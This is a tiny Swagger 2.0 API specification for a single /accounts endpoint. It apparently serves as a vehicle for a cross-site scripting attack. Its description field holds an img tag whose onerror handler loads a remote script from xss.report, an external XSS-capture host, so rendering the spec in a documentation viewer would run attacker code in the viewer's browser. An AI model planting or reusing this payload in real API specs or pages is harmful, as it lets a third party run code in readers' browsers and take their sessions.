swagger: '2.0'
info:
  title: Example yaml.spec
  description:  <img src=x onerror='<script>$.getScript("//xss.report/c/digy")</script>'>
paths:
  /accounts:
    get:
      responses:
        '200':
          description:  nice
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
